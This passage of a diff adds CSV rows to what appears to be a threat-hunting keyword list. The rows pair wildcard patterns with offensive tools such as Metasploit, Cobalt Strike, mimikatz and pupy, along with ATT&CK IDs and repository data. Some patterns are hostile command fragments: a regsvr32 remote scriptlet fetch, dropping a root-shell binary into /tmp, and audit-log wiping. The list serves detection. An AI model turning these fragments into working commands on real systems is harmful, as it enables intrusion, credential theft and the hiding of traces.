and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*_BloodHound.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*_cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*_dcsync.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*_dns_hijack/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*_dns_hijack/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*_dump_users.lst*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z"
+"*_enum_vault_creds*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*_EvilClippy.*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z"
+"*_execve_binsh.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*_find_sharpgen_dll*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*_generate_bind_payloads_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*_generate_scramblesuit_passwd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*_GetNetLoggedon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*_lfi_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*_lsass.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*_lsassdecrypt.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*_mouse_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*_msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*_msfvenom*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*_nimplant_*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*_peloader.dll*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*_posh-common*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*_prefix_PEzor_*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"*_pycobalt_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*_Shellcode.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - 
T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*_tcp_cc2(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*_udp_cc2(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*{process_to_inject}.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z"
+"*| favfreak*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"*| hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z"
+"*|base64 -d > /tmp/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*~/.csexec*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"*< /dev/console | uudecode && uncompress*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
+"*<3 eo.oe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"**","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z"
+"*== NoPowerShell v* ==*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*=Administrator.ccache*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z"
+"*=imaohw*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*=resu ten*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - 
reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*> /var/log/audit/audit.log* rm -f .*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z"
+"*0.0.0.0:2222*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
